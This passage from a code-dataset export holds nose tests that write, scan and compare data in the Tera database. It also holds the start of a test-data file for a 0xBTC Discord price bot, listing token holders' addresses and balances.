] | null | null | null | from .model_stat import throughput, flops
| 21.5 | 42 | 0.813953 | 6 | 43 | 5.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.139535 | 43 | 1 | 43 | 43 | 0.918919 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d54456596933237e231c735e592a3b63a8e70feb | 7,527 | py | Python | test/testcase/test_data.py | stevenswong/tera | 488cea75536287386d52cca411a6a9ee366b73c3 | [
"BSD-3-Clause"
] | 1 | 2019-05-02T00:28:06.000Z | 2019-05-02T00:28:06.000Z | test/testcase/test_data.py | stevenswong/tera | 488cea75536287386d52cca411a6a9ee366b73c3 | [
"BSD-3-Clause"
] | null | null | null | test/testcase/test_data.py | stevenswong/tera | 488cea75536287386d52cca411a6a9ee366b73c3 | [
"BSD-3-Clause"
] | null | null | null | """
Copyright (c) 2015, Baidu.com, Inc. All Rights Reserved
Use of this source code is governed by a BSD-style license that can be
found in the LICENSE file.
"""
import nose
import common
@nose.tools.with_setup(common.create_kv_table, common.cleanup)
def test_scan_empty_kv():
"""
scan empty kv table
"""
table_name = 'test'
scan_file = 'scan.out'
common.scan_table(table_name=table_name, file_path=scan_file, allversion=True)
nose.tools.assert_true(common.file_is_empty(scan_file))
@nose.tools.with_setup(common.create_singleversion_table, common.cleanup)
def test_scan_empty_table():
"""
    scan empty table
"""
table_name = 'test'
scan_file = 'scan.out'
common.scan_table(table_name=table_name, file_path=scan_file, allversion=True)
nose.tools.assert_true(common.file_is_empty(scan_file))
@nose.tools.with_setup(common.create_singleversion_table, common.cleanup)
def test_rowreader_lowlevelscan():
"""
table rowreader_lowlevelscan
1. write data set 1
2. scan & compare
:return: None
"""
table_name = 'test'
dump_file = 'dump.out'
scan_file = 'scan.out'
common.run_tera_mark([(dump_file, False)], op='w', table_name=table_name,
cf='cf0:q00,cf0:q01,cf0:q02,cf1:q00,cf1:q01,cf1:q02', random='seq',
key_seed=1, value_seed=10, value_size=64, num=10, key_size=20)
common.rowread_table(table_name=table_name, file_path=scan_file)
nose.tools.assert_true(common.compare_files(dump_file, scan_file, need_sort=False))
@nose.tools.with_setup(common.create_kv_table, common.cleanup)
def test_kv_random_write():
"""
kv table write
1. write data set 1
2. scan & compare
:return: None
"""
table_name = 'test'
dump_file = 'dump.out'
scan_file = 'scan.out'
common.run_tera_mark([(dump_file, False)], op='w', table_name='test', random='random',
value_size=100, num=5000, key_size=20)
common.scan_table(table_name=table_name, file_path=scan_file, allversion=True)
nose.tools.assert_true(common.compare_files(dump_file, scan_file, need_sort=True))
@nose.tools.with_setup(common.create_singleversion_table, common.cleanup)
def test_table_random_write():
"""
table write simple
1. write data set 1
2. scan & compare
:return: None
"""
table_name = 'test'
dump_file = 'dump.out'
scan_file = 'scan.out'
common.run_tera_mark([(dump_file, False)], op='w', table_name=table_name, cf='cf0:q,cf1:q', random='random',
key_seed=1, value_seed=10, value_size=100, num=10000, key_size=20)
common.scan_table(table_name=table_name, file_path=scan_file, allversion=False)
nose.tools.assert_true(common.compare_files(dump_file, scan_file, need_sort=True))
common.scan_table(table_name=table_name, file_path=scan_file, allversion=False, snapshot=0, is_async=True)
nose.tools.assert_true(common.compare_files(dump_file, scan_file, need_sort=True))
@nose.tools.with_setup(common.create_multiversion_table, common.cleanup)
def test_table_random_write_versions():
"""
table write w/versions
1. write data set 1
2. write data set 2
3. scan & compare
:return: None
"""
table_name = 'test'
dump_file1 = 'dump1.out'
dump_file2 = 'dump2.out'
scan_file = 'scan.out'
common.run_tera_mark([(dump_file1, False)], op='w', table_name=table_name, cf='cf0:q,cf1:q',
random='random', key_seed=1, value_seed=10, value_size=100, num=10000, key_size=20)
common.run_tera_mark([(dump_file1, True), (dump_file2, False)], op='w', table_name=table_name, cf='cf0:q,cf1:q', random='random',
key_seed=1, value_seed=11, value_size=100, num=10000, key_size=20)
common.scan_table(table_name=table_name, file_path=scan_file, allversion=True)
nose.tools.assert_true(common.compare_files(dump_file1, scan_file, need_sort=True))
common.scan_table(table_name=table_name, file_path=scan_file, allversion=True, snapshot=0, is_async=True)
nose.tools.assert_true(common.compare_files(dump_file1, scan_file, need_sort=True))
common.scan_table(table_name=table_name, file_path=scan_file, allversion=False)
nose.tools.assert_true(common.compare_files(dump_file2, scan_file, need_sort=True))
common.scan_table(table_name=table_name, file_path=scan_file, allversion=False, snapshot=0, is_async=True)
nose.tools.assert_true(common.compare_files(dump_file2, scan_file, need_sort=True))
@nose.tools.with_setup(common.create_singleversion_table, common.cleanup)
def test_table_write_delete():
"""
table write and deletion
1. write data set 1
2. delete data set 1
3. scan & compare
:return: None
"""
table_name = 'test'
scan_file = 'scan.out'
common.run_tera_mark([], op='w', table_name=table_name, cf='cf0:q,cf1:q', random='random',
key_seed=1, value_seed=1, value_size=100, num=10000, key_size=20)
common.run_tera_mark([], op='d', table_name=table_name, cf='cf0:q,cf1:q', random='random',
key_seed=1, value_seed=1, value_size=100, num=10000, key_size=20)
common.scan_table(table_name=table_name, file_path=scan_file, allversion=True)
nose.tools.assert_true(common.file_is_empty(scan_file))
common.scan_table(table_name=table_name, file_path=scan_file, allversion=False, snapshot=0, is_async=True)
nose.tools.assert_true(common.file_is_empty(scan_file))
@nose.tools.with_setup(common.create_multiversion_table, common.cleanup)
def test_table_write_delete_version():
"""
table write and deletion w/versions
1. write data set 1, 2, 3, 4
2. scan
3. delete data set 3
4. scan & compare
:return: None
"""
table_name = 'test'
dump_file1 = 'dump1.out'
dump_file2 = 'dump2.out'
scan_file1 = 'scan1.out'
scan_file2 = 'scan2.out'
common.run_tera_mark([(dump_file1, False), (dump_file2, False)], op='w', table_name=table_name, cf='cf0:q,cf1:q',
random='random', key_seed=1, value_seed=10, value_size=100, num=10000, key_size=20)
common.run_tera_mark([(dump_file1, True), (dump_file2, True)], op='w', table_name=table_name, cf='cf0:q,cf1:q',
random='random', key_seed=1, value_seed=11, value_size=100, num=10000, key_size=20)
common.run_tera_mark([(dump_file1, True)], op='w', table_name=table_name, cf='cf0:q,cf1:q', random='random',
key_seed=1, value_seed=12, value_size=100, num=10000, key_size=20)
common.run_tera_mark([(dump_file1, True), (dump_file2, True)], op='w', table_name=table_name, cf='cf0:q,cf1:q',
random='random', key_seed=1, value_seed=13, value_size=100, num=10000, key_size=20)
common.compact_tablets(common.get_tablet_list(table_name))
common.scan_table(table_name=table_name, file_path=scan_file1, allversion=True, snapshot=0)
common.run_tera_mark([], op='d', table_name=table_name, cf='cf0:q,cf1:q', random='random', key_seed=1,
value_seed=12, value_size=100, num=10000, key_size=20)
common.compact_tablets(common.get_tablet_list(table_name))
common.scan_table(table_name=table_name, file_path=scan_file2, allversion=True, snapshot=0)
nose.tools.assert_true(common.compare_files(dump_file1, scan_file1, need_sort=True))
nose.tools.assert_true(common.compare_files(dump_file2, scan_file2, need_sort=True))
| 43.761628 | 133 | 0.700146 | 1,162 | 7,527 | 4.253012 | 0.100688 | 0.111089 | 0.070822 | 0.091056 | 0.879401 | 0.877782 | 0.874747 | 0.871105 | 0.825172 | 0.81728 | 0 | 0.040686 | 0.170586 | 7,527 | 171 | 134 | 44.017544 | 0.750921 | 0.097516 | 0 | 0.608247 | 0 | 0.010309 | 0.062034 | 0.007146 | 0 | 0 | 0 | 0 | 0.14433 | 1 | 0.082474 | false | 0 | 0.020619 | 0 | 0.103093 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d55049dc6723dd0f05dca5fd9bcce271974163bc | 69,452 | py | Python | test_data.py | JoaoCampos89/0xbtc-discord-price-bot | 6eb6839213dfb0176c0be72c2dda7193d4131750 | [
"MIT"
] | null | null | null | test_data.py | JoaoCampos89/0xbtc-discord-price-bot | 6eb6839213dfb0176c0be72c2dda7193d4131750 | [
"MIT"
] | null | null | null | test_data.py | JoaoCampos89/0xbtc-discord-price-bot | 6eb6839213dfb0176c0be72c2dda7193d4131750 | [
"MIT"
] | null | null | null |
top_1000_holders = (
(1, '0xc91795a59f20027848bc785678b53875934792a1', 168055.0),
(2, '0x8d12a197cb00d4747a1fe03395095ce2a5cc6819', 86981.09296424),
(3, '0x327432a31cc79c697befe20a52f5d2214cbf0be4', 86686.42293475),
(4, '0xe03c23519e18d64f144d2800e30e81b0065c48b5', 84022.33928554),
(5, '0x6a1cb270d2783ed7303d6403cc95241210b1eacf', 82011.0),
(6, '0x69c86b520b5388da58de26d7359691f8b977eb24', 75440.98899182),
(7, '0x2a0c0dbecc7e4d658f48e01e3fa353f44050c208', 70138.44433512),
(8, '0xb86bb5fc804768db34f1a37da8b719e19af9dffd', 40579.69354045),
(9, '0x8fd5f49ee858e788856412c540e27982d438adc1', 38077.86678947),
(10, '0x55f841e0f77ac574d64b334976946e4fca348e9b', 36197.32435793),
(11, '0x6f9bb603f19f2fb63a3d743860b994016df70bf4', 35598.13488865),
(12, '0x5ffabb924ca8216ac08861eb9171c4cccddd32f6', 34924.25393892),
(13, '0x44e9e39273db66826d12098ba7c9cec15505ebb0', 33007.11995818),
(14, '0xe3740b267b3a561cc931e51f22855029a6e35854', 32139.11872249),
(15, '0x86e6301c7d3f961e508c64e03f73d64799fcc5a4', 31815.0),
(16, '0xc3bf837ab9779424c78385b9c843e74178693f17', 31562.8755694),
(17, '0xb9d82aa3b15b5956dc21f117515abbbda1efa4d6', 29673.2185391),
(18, '0x326d9d4870c636d9b25c939237e0f1ea9ea1a974', 28928.85653498),
(19, '0x778f8d797efc24b1516dc7321920a1fd2b639a7e', 28736.27946675),
(20, '0xbf45f4280cfbe7c2d2515a7d984b8c71c15e82b7', 25518.64353119),
(21, '0x0fb1cd32b5d0f767f3a36f4ffeca8e4969b47f6e', 25279.88237447),
(22, '0x3c2e663c5e517bcc1134acfd7ce71b94b7e6da2f', 24353.00844724),
(23, '0x14b08137ec1c92f6110b0587a87e4904448d20ff', 24000.0),
(24, '0x4533b3a3f7606062705844778fdfa1be338b57f1', 23900.0),
(25, '0xdf1990774b1ab5c24274b9fce520e94effba8e70', 22696.27021038),
(26, '0x51f21392482224c123fecdafa9543fc5b7d14847', 21758.32357339),
(27, '0x6b9c15cc1d35be1001bf020394548b744d6dfd21', 21350.03693429),
(28, '0xa820cd25a61c1b12085a7f232cf01ddfb88f267d', 21000.0),
(29, '0xad738df8c0c1cb9f2e5f403c06ae25a8478c6077', 20155.34753473),
(30, '0xf0347ed4a1a74a6ae7dd1cfa48a3477fee461771', 19834.65048894),
(31, '0x249b8ab5c0b29cb63cbc88c0971806d41182d469', 19700.0),
(32, '0x6dd4aedd751bc6a3169a56a3d7dc6c557f9adbc1', 19500.0),
(33, '0xc718a048a66035200ae889b6e5ccfd7fe47422ad', 19350.0),
(34, '0x4a746a4be02c093bba7a3717e76a08344a64d4e5', 18991.52651168),
(35, '0xa2ed64126ddb337b41cfb988c9b0fecd0541cd39', 18681.82704739),
(36, '0x29a508940e2ff3be847cdf7db24391ae62ec998a', 18616.74619077),
(37, '0xbb6ab3cf7cabe055a96ca165421927305ee4d30b', 18569.51711699),
(38, '0x560ea9b1f348aff179d9bf5b02b50cc04abd344c', 18250.0),
(39, '0xf12619f9b3d82bc65fe2cf07ad6f7efcf548f94c', 17550.0),
(40, '0xe332eb2f5fa463c0ff5c733646327b6be7f870db', 17142.7994556),
(41, '0xf2E7474BF1547b5927F8985B35107183C8aC25f7', 16756.8635621),
(42, '0x955b13186bf8cddba2b97471483d26f302f2072e', 16550.0),
(43, '0xa80009a98ad783351be9c19cf51193b9a9aefc62', 16050.0),
(44, '0xf906e0238a308b00f50ec7b932db3faebf4795c2', 15950.0),
(45, '0x954b67f9bb6fa3c73b894dfce487b6c970eced77', 15950.0),
(46, '0x9b1a161bdb6cd429e12e09fdd287de2c094f4295', 15361.89157954),
(47, '0x664b1f16c8c120f3d99dd372315b6e5a96f7ef40', 15105.53242574),
(48, '0xc1cd31c394edc5c648dc376a51d43e4f9ad2465c', 15000.77440421),
(49, '0x5d35db09e1ef7a2ba65ebfd2f377a59f62f2355a', 15000.0),
(50, '0xbd6b376c884b600731bff0053eb5869587279e34', 14317.42608519),
(51, '0x10e8e873f03d10094de678702a4a5df03cc285dd', 14174.0),
(52, '0xb6f6d05f978af3c5335380fdd9f6993031e29ada', 14000.0),
(53, '0xff190a4cc92b154635140335791d3779f60dc311', 13479.85348),
(54, '0x02e8d1E187f80D68FE414111C4f0AD26011f9A89', 13250.0),
(55, '0x0969a43951cda021a72b1eb8e5db620491c5740c', 13000.0),
(56, '0x26f2a6e1d3d94f9354f53685be9c24d3b7e03306', 12934.78804807),
(57, '0x1018bdd2026dc53ea1e9a2d0f222048f24874c7d', 12883.0),
(58, '0x07B950A89D7913516B0beD483536B53A0266c8a7', 12550.0),
(59, '0xcc675e6688255169effec1b556730ba2479a9ea3', 12488.97376835),
(60, '0x9d9aefba215363f2def001478818dc288805a34c', 12049.10023846),
(61, '0xf438886574fc6aacbbc1c1a139d4bdecb2ec34bc', 11950.0),
(62, '0xac71aabfb3847f499aa65e02dbcc6646a42c4a09', 11838.13695172),
(63, '0x2202ae82877ac6f5e516bb9db841b28f3d8f6681', 11570.0),
(64, '0x065a37eead5b3889717be041abb8af3fb070e889', 11532.32508426),
(65, '0xf38dBB29ea87850DfBB7F17795D0A9c33811670D', 11500.0),
(66, '0xe0729a1ae5019f259cd02797915d9a7e8915035a', 11413.0),
(67, '0x04806bac84ccde79da6b376398dfeb42888def50', 11003.49458216),
(68, '0xde4c8857a3719127c8f8a771dbfc4d3aea2c58dc', 10703.13408212),
(69, '0x444b0f5050f6c21a310131fd1409b6492c93d169', 10573.15499114),
(70, '0xe1874b684a454f0643f2419aa105715328c5bbd3', 10523.35593131),
(71, '0x017d74b121c0161a09204b8112838fa55f6c7c28', 10365.70518057),
(72, '0xce43a38234a9ef7e2713b07c1305ee34c887519d', 10323.42213666),
(73, '0xe3e5a431478b622826ceabed15f653cce86316dd', 10115.0),
(74, '0x991bd83f4c601fc3798839d4e4372d628607f7c9', 10059.0),
(75, '0x74b39872dd7726964d571d54456760fa114061d7', 10000.3149103),
(76, '0x596511082a4475bf952cff3d11d0beacea09b566', 10000.0),
(77, '0x436328a0234fedb420C7693bB7C74f53393bc282', 9950.0),
(78, '0x568d354723b6730d7a0d09e0cfd6911f3c2eac87', 9743.75605808),
(79, '0xf4a5881b38d9e6bdb5b26fe31a0a8c3164c827a3', 9620.0),
(80, '0x65309c191325f87d75cd55faaed40d5963238282', 9473.444372),
(81, '0xbfb595963d5cac4296d86a32ce92102ea78c33cd', 9421.0),
(82, '0x523e099ecf075cb42fb2bb54d9b95eb15e63af83', 9419.81061676),
(83, '0xbc43d4ba301223315fa6c11722263c022ab92d05', 9406.79661033),
(84, '0x7749db3a5918b0bcd1a61cbf00b9e449533ce083', 9314.734),
(85, '0x57de0d94f85d9b8ed865131e2731ff86edc2a231', 9265.0),
(86, '0x66ff763f177cf65e2aeffa4fd5afba547b588018', 9186.41596562),
(87, '0xef419e05e15951fde65477bc444cefbedd042038', 8886.0),
(88, '0x7c09ed1cf18f34bded7eecc31c078f9ac84f8bdd', 8800.0),
(89, '0x8c469b5b7afa5ee847864f558de822fb2e338e45', 8556.26175341),
(90, '0x34eb01faf7d5e90a245f60d83a9790628e6c4405', 8321.42158034),
(91, '0xcb29dfecb1f172189460df860ecaa603396e1157', 8000.0),
(92, '0xc854b796648e31ee25b83ce30ddab8ff3402437c', 7807.01110065),
(93, '0xff7c6977c5e9fb5607f80d7fc57632bea8d85191', 7746.0),
(94, '0x4b2dff7d92f2865f3b1ae2d018c0bf6565923ee9', 7588.97860943),
(95, '0x2850250328347d6135e8aefa4800c8a6944fd7b3', 7350.56746817),
(96, '0x7ff49eaa3794ff7f24c86d11683c24e748ac4c0c', 7257.14485542),
(97, '0x31316c75768ca10f683e17882b34d13fc1caccb6', 7227.0),
(98, '0xab96a6e4ce7c4cbbaf44d7955eaed799694b1275', 7203.0),
(99, '0x7dee5dd185107c1fbe84202888330be03897989a', 7159.1234115),
(100, '0xce749bd8ed07de10b87eab1dc0400e5cd032a5c9', 6961.9514499),
(101, '0xc97497cb5a54d28753a7b812b4c9b38a08179d11', 6889.76607399),
(102, '0x80d5aeda8434eb33164425ff85ad44e397f26422', 6886.94643542),
(103, '0x257d13eb0651843fbfd880754794f50ceaf4ce0c', 6860.91934523),
(104, '0x312deeef09e8a8bbc4a6ce2b3fcb395813be09df', 6836.0),
(105, '0xef6f4d006c30bed47b705e7ac6767c28ee58e972', 6830.0),
(106, '0x77726c5a3dff708356aa355488b69eebd8490453', 6829.50220028),
(107, '0x857d796d9D47E50D73636348C4D22486Cf9F443f', 6765.16815795),
(108, '0x4dacba56b747b379b90c19bd751b5643e6ccf9f8', 6707.64822341),
(109, '0x7a47501cba5d028f374c4839329896f2ab4309c2', 6677.08072858),
(110, '0x5f1d47144121163999ab22813702041e1b6bc35b', 6626.43),
(111, '0x9d573aaed110bf68f2cadd91debf964ef788b342', 6571.97879852),
(112, '0x284c78734d21e76015befd12c9594e06854257a1', 6416.0),
(113, '0xcced6ce6fb65a1a82721c0d687a836c17f17bc55', 6176.0),
(114, '0x72872d7cdbee062e01441b5e43cd0decd1100574', 6168.0),
(115, '0x9f18cf7439a0a6d834f01fdd21643e91ca5c5eb2', 6010.0304766),
(116, '0x7ea4e9688414b15bbd8078d92967bb6b80704ccc', 5972.83028932),
(117, '0x14d9d3480b8f987e6c4bfd3417ef10b72097e021', 5956.78471883),
(118, '0xA3015196301963865e4df2ad681A7817C8Ff055a', 5850.0),
(119, '0xe4bfd3bf03439ca715899daa5ca7b48a2244b67f', 5776.0),
(120, '0x0486f20c14872c2d6cf2bf271167d344f3b4bd4c', 5751.15238763),
(121, '0x432a1671e5e2539d2fe2e76820b6a2192ba9bd00', 5727.793),
(122, '0xb71d443730426450f59981a3ed0eb1d5050c36d3', 5654.29266344),
(123, '0x385eb183223aaf5cda6022f6ed26faac1e3c0a47', 5485.0),
(124, '0x3a0d1c0b3552ee27cd4ade9683a21ec7b8537e59', 5462.04204858),
(125, '0x656038e97cee7c095673f7b9fad695b323a6f098', 5340.41193389),
(126, '0xc16ccac44cbf7a75d8dfa421d6a58332fcf98bd5', 5316.75),
(127, '0x14fcfd34f3c88289efde9f6ce3f39dade2ca91bd', 5290.41210963),
(128, '0xda83016373468648af9a38478dfbff176beaf0d6', 5275.99843724),
(129, '0xb98d2fc4552cf933b088929264bcc70746205b0c', 5232.03126159),
(130, '0x0237e36334bd27fa7344425005a036a4d9c3dea0', 5200.00054061),
(131, '0x8ab718d4b547a364c654ec024e13729ca725f458', 5149.86345906),
(132, '0xc573c359fb77fd26f9107e3969674364315bb0a0', 5085.0),
(133, '0xbd44b36ad14e7f49c20ba32128b6136ad63521be', 5085.0),
(134, '0x9dc446bf12c392e82862d564a6b3dd4adcb65d4f', 5085.0),
(135, '0xa5d687fdcab26e0e6451cfa1dd2353fa3efb7e53', 5085.0),
(136, '0x548c7a27c33f3e1d59fd9ee97b7d56a2e4a5139d', 5075.0),
(137, '0x43ccdf5edcfc63536d2e2e67ec8b89130358574c', 5013.9503012),
(138, '0x78ec2ba16fe5bbb08669c0f4328f455f514a3dd7', 5000.13064704),
(139, '0x2dd3ce6d874ae68f041db2cd38b29cf83e0eb677', 5000.0),
(140, '0xc8efac168037fffe390cbc45e3ab12a47df7fd71', 5000.0),
(141, '0x61385f4c311f689921b854ba500ffe7f4a9c2e45', 5000.0),
(142, '0x6da4ec022e70c79b6681724690c715a8482c6669', 5000.0),
(143, '0xb3b735e53f9e76e111e6c7e65154216fcc7cce87', 5000.0),
(144, '0x158136112d8a2c70d3b60c4075a9dc30372e563c', 5000.0),
(145, '0x933e7970b0cb7ecffded4e15a33a979e36853d0c', 5000.0),
(146, '0x52148dfb0546e28a50c5f4308cf8646d695ad51f', 5000.0),
(147, '0x92ad3e907e7e4a160a551ae142eca634cbabfde4', 4999.99951122),
(148, '0xbb5dc8b678cd40a201aa39e3ebf19266c5b03062', 4960.37681654),
(149, '0x040c816cc9def641465fc784d9dbc492cf4d6ec6', 4899.77587528),
(150, '0x709e214D05c5F9e2cE8254B098C3ca8393090584', 4885.33492083),
(151, '0x3da339f504f182efd913d883e03c347b66c980a3', 4810.83821607),
(152, '0xbd4ae0dc3c0fa45e0119d3c108acde1dad5e7825', 4750.105681),
(153, '0x1b57b6fc5c0c0008168ff651ebc9441a84ecb860', 4730.0),
(154, '0x1cd84ab8312475aa387260c0a1c8c9ecfd790832', 4518.36964449),
(155, '0x60b96ddb82de510d8f36f4cc50f158db10b7b7cb', 4487.0),
(156, '0x3816fa4097d6a44e3f66c520b4bacc0bc9a6b78e', 4302.23284712),
(157, '0xaa754059e27d36c70a9f3c20646071c52e364809', 4219.36516939),
(158, '0x5934e70499138a78c96a9546e8dc87c8c0e900b4', 4150.0),
(159, '0xa9f3304c9b8e79bab8448f2881d9877f9a022fa9', 4141.53860996),
(160, '0x3d5a9e766ceb574b05b6f4ee4f55cffa174a0cbd', 4093.61159045),
(161, '0x1941838444d15b9d3d9b46c0879ea5d632997522', 4076.0),
(162, '0x318ec61f4afcb385e3544acc11206db3a0e6b92a', 4055.93645378),
(163, '0xe4417510005f849bb4fdce2836d4bfbdd5f11b0b', 4008.0),
(164, '0xc82c179beddcf474fd19394c174b2fdb0222e971', 4000.0),
(165, '0x6fee393fcaa84833fd41de8b34e6a47f954e41da', 4000.0),
(166, '0x8533a0bd9310eb63e7cc8e1116c18a3d67b1976a', 3999.4),
(167, '0x76b57f58784280e00dff14d03b97d96744cfd04f', 3967.85025701),
(168, '0xe42e4b61797f148e6da859b83de7064d33f4012a', 3885.24849943),
(169, '0xe0261acfdd10508c75b6a60b1534c8386c4daa52', 3810.80232407),
(170, '0x7441bdaae80b6c09d132f7f9390d09fc3591c813', 3752.52769437),
(171, '0x138dd537d56f2f2761a6fc0a2a0ace67d55480fe', 3687.33887359),
(172, '0x09809ddeff19fe0a61b65cb7890cba6809f6ab50', 3654.19389386),
(173, '0x4168cdba17e697302199803310a08fc3a0871e14', 3634.0),
(174, '0x39764ed873f61c47edd8a3cc80b5455136506a51', 3631.38418396),
(175, '0x1d6ef6ca844483e38994e043c917715c986d26a4', 3611.03570881),
(176, '0x0eccf3295b5dfcfce69044ea157d55dfd0f0b955', 3524.82062045),
(177, '0xd36b4fdd2d99af20cb0dc335f48db986a143ac94', 3516.0),
(178, '0x1d0e1068c52ee39f69622f80acce180003842657', 3403.2027711),
(179, '0x24274060c5aa0587fa0c8f11f705b34645afbc01', 3386.5),
(180, '0xdbfa7b76b9da25a2f5c403e87d3e4f5a539587cb', 3341.227),
(181, '0xb9c53e90ad0d2acfe5b5803ca7af30ba3ed695a0', 3289.32981124),
(182, '0xb8ffb57e772276233c57d1d34c9b99457b51575f', 3273.45),
(183, '0x1d1b62da8d1527adc29421b1989652661972ea5f', 3250.99796437),
(184, '0x8b8f50386542bb72e3c16b57c49d146c195caf90', 3181.52002779),
(185, '0x3757e81f5709c08fb073047a6b28a367b110c727', 3167.02032925),
(186, '0xcb31565a57cf802fef41d97cf292976087bfc2a9', 3158.59054137),
(187, '0xc9a1c3e1b638f1172a8ef0129cb50dcfa36e168c', 3120.69931027),
(188, '0x6def006ca0ad75b535602f11de830b84aae610a2', 3106.10781353),
(189, '0x7e7e2bf7edc52322ee1d251432c248693ecd9e0f', 3091.78022543),
(190, '0x9a4c9afe74d5b84f3f2a49a7c4b98788a4a397b4', 3030.0),
(191, '0xaa4dce781266c9c55979add1021289de2db78d80', 3001.33532453),
(192, '0x495454430db6e8a503c419aa76a5d9d924b308df', 3000.0),
(193, '0x57a6ec3f48c4075bd3ee6e0dec520bca2a9b7ac8', 3000.0),
(194, '0x377e751d86ba9a187019a26ab3aa2d0240f0c788', 3000.0),
(195, '0xc9a7dd1973b569fe042ec5785689bf243e362f55', 2999.99987797),
(196, '0xd74186f70fa7f7c11c90eda9098be989d542bc97', 2994.7652797),
(197, '0x8bc9bea87871ee3aab5b2c05aaadcb322b43b345', 2989.12407997),
(198, '0x0685a9a7f425b6e2ea37b83b53bed9ef9c498cb0', 2950.55507271),
(199, '0xabc3b0796629973221efa382d947cfb1b9dc75b6', 2950.0),
(200, '0xa388585123f7065cbdbd51745d3546ddf98bfea7', 2931.23666557),
(201, '0x672f826e7d165233ca56c42222f00669b7f66e2f', 2923.98834233),
(202, '0xdd1f8d7fe5032bd228296283f7c4d6299f15bee4', 2900.0),
(203, '0x21749e24ea7816e0a98d716d2783ad467e8a32d5', 2874.70868204),
(204, '0x204b63c632c623d10f6286b2c445429974afc738', 2822.38570794),
(205, '0x39caa5e5109934b63f338f14d93d13ee1b005e10', 2799.08946054),
(206, '0x0d32cbedf2cbdfbfcb4ed5c8498025909dc15515', 2795.90478382),
(207, '0xc9b5f4f55c2cf976b7614c3efa612d02ca303852', 2765.0),
(208, '0x84d96968235a6a60d4f7bfaa77112bcf02e739ca', 2709.18115913),
(209, '0x508cacb166ee3b304252c624efd5448806809d8b', 2700.1061071),
(210, '0x68a4693a011d0b9e81e70fe4e0a98d75a243bfd3', 2700.0),
(211, '0x8ab316245834d9486a250e72e62bdd92b246e5cf', 2660.37025614),
(212, '0x7132c9f36abe62eab74cdfdd08c154c9ae45691b', 2650.0),
(213, '0xee658666344cc57da9c7d5fd569dba0f19b771a8', 2646.81153058),
(214, '0xd50cc43c038a9b5a8123a7edb4bdccd47bf95487', 2643.48408839),
(215, '0x6941f1db178b46ceb547c724394da63f2b351463', 2639.817),
(216, '0xad9f11d1dd6d202243473a0cdae606308ab243b4', 2622.00736585),
(217, '0xf6d0c445f9b8894cacc7a4c1a222ba29d665261e', 2613.41195233),
(218, '0xb5647a8d2914a85886077d90f8adb7e0046d4d19', 2600.0),
(219, '0xb5b9f370da828feb7115226e57387309c2b497d8', 2565.35449369),
(220, '0xbfc8b31da13a14b1e620e8068f57fd464915c5a4', 2555.44168798),
(221, '0xe6e89ac4cb1ff0760bb5d8e8e102e19313cfed3a', 2534.9),
(222, '0x069caffd302b6df7847f1981d8df293130e3d88f', 2531.17676701),
(223, '0xed26aa6c349e7e160a20c2e18e507ff0a65e16c5', 2520.40118203),
(224, '0xb2dbfe83f4d2cb3259b59f7b37daa5b863bd4c1f', 2503.39514564),
(225, '0xedea79af2fc57373179a2b70d5aac397d4bf571d', 2500.0),
(226, '0x3f5ea9bc419b53ac1bef6a295237e8095278dbf0', 2482.03676885),
(227, '0xfee214ef3d5add3b0c1380c19871fb8e8c311291', 2437.309496),
(228, '0xfc3318c9f21a37043de661142e461f8badd0ab8a', 2435.46327425),
(229, '0x31d27085e20a0f41b18bd1ffd8c2821f14ed07e9', 2400.0),
(230, '0xe988d96a2d431f3a0ca94f9fcb26208e16d1dc40', 2400.0),
(231, '0x6c77195e75a212bf0be93fefe429bc0c2a51a0c9', 2383.76),
(232, '0x42982716d6061dc53c15357396d74ce7eeab65d6', 2373.008),
(233, '0x9268cf67e213209e5c786777d45569e9dbc27bad', 2355.388),
(234, '0x525f94485486b506fe2db50e815d4eb95fb54cef', 2344.8048063),
(235, '0x10faf5c2f24902c70f84d8d0ba5c27a3a3d0f5ef', 2334.5371926),
(236, '0x654be9db579fb3bc3181cac6b615596138816128', 2300.06329373),
(237, '0x506f1823ba9684129b93e8b7fc98798a2e9248f2', 2291.05307575),
(238, '0x6179dc12608597198454591f0b6dba2000279ff2', 2289.160542),
(239, '0xbdcdbc4a5c0bea0449268fd31950475bad8be59e', 2283.98124258),
(240, '0x59d63178eb1d9f1a0472d6297c9da4f655e0e3bc', 2229.5221913),
(241, '0x69155bf4fa9820cc7f6b8081f9ffc0df714bb8e3', 2224.35286567),
(242, '0xca5e1903211a4eec7c20902ca1d96da20e8b7c0d', 2221.99952452),
(243, '0x0910d57ad1d9d537bbebf589d1dd2e19571c716e', 2167.36519397),
(244, '0xfff72ee0dba7b9f8027cfe7bfed3f773d872f2fc', 2161.32636643),
(245, '0xcfed8d831d5c1c674726999377823891ba8a7bae', 2150.0),
(246, '0x20fd3a40e78957c8903370c57bb51f113d7cd897', 2145.75589949),
(247, '0x15b716564468a22f109667a6f61fdb83954d0de2', 2098.56395832),
(248, '0xcf196825f25866fa3a53153b76f3399bdfcd1dad', 2024.00991565),
(249, '0xd1c12add513c305067508b2f690916ea67dc2338', 2005.12178476),
(250, '0x5aa30e508d3dbb6ff7e7a81bdcbcdbfbd6877679', 2004.93770793),
(251, '0x3be0c1fcacf5ca5ceb8324323555845bb17eb99d', 2002.80680229),
(252, '0x15105e0c857bfcd85971afe99bcb4f2390475c89', 2000.0),
(253, '0x7b1407b9482b06a5c05f798bef36889394a69e62', 2000.0),
(254, '0x6dcd2776db668212e6f3a9707811429ee0410d1e', 2000.0),
(255, '0x953b70eb266c83c58c00636af28c7c1143f8a518', 1999.99999977),
(256, '0xfa5f9becd2da45c81a8e3b08fb337a19edeb54b6', 1999.0),
(257, '0x08b0a627bf0239aba77f4c9687fcd296e649ee34', 1975.0),
